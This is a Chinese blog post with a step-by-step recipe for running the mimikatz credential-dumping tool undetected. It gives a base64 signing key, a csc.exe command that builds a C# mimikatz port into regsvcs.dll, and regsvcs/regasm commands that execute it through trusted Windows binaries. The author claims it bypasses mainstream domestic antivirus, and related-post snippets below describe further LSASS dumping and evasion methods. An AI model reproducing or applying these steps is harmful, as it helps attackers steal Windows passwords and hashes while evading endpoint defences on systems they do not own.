mimikatz免杀(反射PE注入将mimikatz加载到内存运行)

已于 2022-03-16 14:05:11 修改
阅读量944 收藏 3
点赞数 1
分类专栏: 免杀 文章标签: web安全
于 2021-10-17 23:44:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/X_sweelg/article/details/120818363
版权

下载csharp版本的源码katz.cs(下载地址放在文末)

在powershell中生成key.snk

$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte

 然后把生成的key.snk和katz.cs放到C:\Windows\Microsoft.NET\Framework\v4.0.30319目录下

直接运行即可

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:regsvcs.dll /keyfile:key.snk /unsafe katz.cs

 目录下就会生成regsvcs.dll文件

 调用方式可以采用

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
x64
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe regsvcs.dll
[OR]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U regsvcs.dll

演示第一种regsvcs.exe regsvcs.dll

 免杀性还是可以的,国内的主流杀毒软件都能过

参考地址:GitHub - ssssanr/Mimikatz-Csharp

Sweelg
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
mimikatz免杀手段来绕过杀软的限制
LiBai'S BLOG
11-12 5万+
在内网渗透过程,我们常常需要利用mimikatz工具dump出lsass进程来获取明文密码或者hash。但是一般杀软对mimikatz的查杀比较严,对lsass进程的管控也很严格。所以我们需要用到一些免杀手段来绕过杀软的限制,方法网上特别多,下面讲讲我自己实践过的几种。
bypass360!内存加载Mimikatz工具
潇湘信安的博客
05-19 191
C#实现的一个远程拉取Mimikatz.ps1到内存加载,分离免杀工具。通过调用powershell模块的接口远程拉取mimikatz的ps脚本到内存来规避一些杀软的检测
Mimikatz的18种免杀姿势及防御策略
最新发布
2301_76786857的博客
07-04 93
本文主要介绍了如下5类免杀方式,共18种免杀方法。本文虽然是针对Mimiktaz进行免杀,但更多的是想研究学习一下比较通用的exe的免杀方式,比如文介绍的exe通用加载器、powershell执行exe、白名单加载exe等有几种方法可以适用于任意的exe免杀,如果只是针对mimikatz进行免杀完全没必要这么啰嗦的。1、源码免杀。在有源码的情况下,可以定位特征码、加花指令、多层跳转、加无效指令、替换api、重写api、API伪调用等等,这部分内容较多略复杂,打算另写一篇进行介绍,本文不多介绍。
.NET反射的使用
ekinyang的专栏
06-30 1038
反射的定义:审查元数据并收集关于它的类型信息的能力。元数据是一种二进制信息,用以对存储在公共语言运行库可移植可执行文件 (PE) 文件或存储在内存的程序进行描述。将您的代码编译为 PE 文件时,便会将元数据插入到该文件的一部分,而将代码转换为 Microsoft 间语言 (MSIL) 并将其插入到该文件的另一部分。在模块或程序集定义和引用的每个类型和成员都将在元数据进行说明。当执行代码
免杀方法(一)mimikazta
qq_56426046的博客
10-03 2519
—————————————————————————————————————————————————————————————为什么要难过,一直微笑就好啦。Mimikazta是一款能够从Windows认证(LSASS)的进程获取内存,并且获取。我们可以通过github上的开源代码对其进行源码免杀从而bypass反病毒软件。明文密码和NTLM哈希值的工具,攻击者可以借此漫游内网。源码免杀也是基于特征码的一种免杀方式,只需要定位源码的特征代码进。行修改就可以达到免杀效果。查找替换关键字mimikatz
Mimikatz-内存的SSP
weixin_45682070的博客
06-25 416
首先说一下SSP,安全支持提供程序(SSP)是Windows API,用于扩展Windows身份验证机制。LSASS进程正在Windows启动期间加载安全支持提供程序DLL。这种行为使红队的攻击者可以删除一个任意的SSP DLL以便与LSASS进程进行交互并记录该进程存储的所有密码,或者直接用恶意的SSP对该进程进行修补而无需接触磁盘。 该技术需要管理员权限,可用于收集系统的凭证,这里用mimikatz介绍两种,一种是 注册SSP DLL ,二种是 加载内存 注册SSP DLL Mimikatz压缩包
2020.06-Mimikatz的18种免杀姿势及防御策略1
08-03
标题 "2020.06-Mimikatz的18种免杀姿势及防御策略1" 描述的是关于网络安全领域的一个著名工具——Mimikatz,以及如何避免被安全防护软件检测到(免杀)的多种方法。Mimikatz是由Benjamin Delpy开发的一个开源工具...
2014.7月最新面杀mimikatz 2.0
07-10
mimikatz 2.0:2014年7月的免杀神器与Windows系统安全探讨》 在信息安全领域,mimikatz是一款备受瞩目的工具,它以其强大的功能和灵活的运用,被广泛用于系统权限提升、密码提取以及漏洞利用等方面。2014年7月...
mimikatz_trunk-1_mimikatz_
10-03
mimikatz:Windows密码解密利器》 ...通过分析压缩包的文件,我们可以了解到mimikatz的功能、接口、使用规则以及针对不同平台的实现。然而,任何使用都应遵循合法性和合规性原则,确保信息安全工作的正当性。
mimikatz_trunk2.1.1.zip
08-03
标题的"mimikatz_trunk2.1.1.zip"指的是mimikatz的一个历史版本,这个版本可能在Windows 10操作系统上仍然能够正常运行。本文将深入探讨mimikatz的功能、原理以及在Windows系统的应用。 mimikatz是由法国安全...
mimikatz获取系统密码
03-28
1. **权限要求**: 要成功运行mimikatz,通常需要本地管理员权限,但某些操作可能需要更高的权限,如域管理员。 2. **法律与道德**: 使用mimikatz必须遵守当地法律法规,确保在授权的范围内进行,否则可能触犯法律。...
mimikatz(windows 明文密码抓取工具)
04-02
windows 明文密码抓取工具,分别有32位和64位版本,在XP和win 7 旗舰版上测试成功
mimikatz免杀过360和火绒
qq_44905657的博客
12-28 2082
mimikatz mimikatz是一款能够从Windows认证(LSASS)的进程获取内存,并且获取名闻密码和NTLM哈希值的工具,攻击者可以利用这种功能漫游内网。也可以通过明文密码或者hash值进行提权。这款工具机器出名所以被查杀的几率极高。 1、免杀方式 对mimikatz我们进行源码免杀。源码免杀只需要定位源码的特征代码进行修改就可以达到预期的免杀效果。一般的定位特征码分为三种:定位倒代码上,定位到字符串上,定位到输入表上。 2、免杀处理 我们访问https://github.com/genti
mimikatz使用以及源码动态分析
weixin_46956745的博客
05-08 2813
mimikatz使用以及源码分析 文章目录mimikatz使用以及源码分析前言一、mimikatz安装运行二、mimikatz源码分析1.函数具体功能2.函数源码分析(动态)总结 前言 Mimikatz 是法国人 Gentil Kiwi 编写的一款 windows 平台下的神器,它具备很多功能,其最亮的功能是直接从 lsass.exe 进程里获取 windows 处于 active 状态账号的明文密码。mimikatz 的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz
C# 动态编译及反射执行
aao11468的博客
06-07 126
#region 程序集1 无参数、静态类下的静态方法 static void CodeAssembly_1() { //提供对 C# 代码生成器和代码编译器的实例的访问。 CSharpCodeProvider provider = new CSharpCodeProvider(); ...
几种姿势运行mimikatz
小晓晓晓林的博客
01-21 4827
Mimikatz是一款能够从Windows认证(LSASS)的进程获取内存,并且获取明文密码和NTLM哈希值的神器,内网渗透常用mimikatz获取明文密码或者获取hash值来漫游内网。但是在实际的运用,常常会遇到杀软的拦截,所以这里我借鉴网上的资料,进行复现学习,达到免杀绕过的目的。有些方式没有复现成功我就没有写出来了,有一些成功之后似乎也会被拦截了。 姿势一:powershell ...
mimikatz bypass360全家桶
不想当脚本小子的脚本小子
03-20 504
环境配置: mimikatz源码下载:https://github.com/gentilkiwi/mimikatz 设置vitual studio为c++ 在工具安装xp的相关组件 改为x64 将mimikatz属性警告视为错误设置为否 在编辑打开查找和替换 将所有的mimikatz替换为test 将文件名称的mimkatz也全部替换成test 接下来修改ico文件: 把ico文件替换成为36-的ico文件 重新点击生成即可 .
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sweelg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值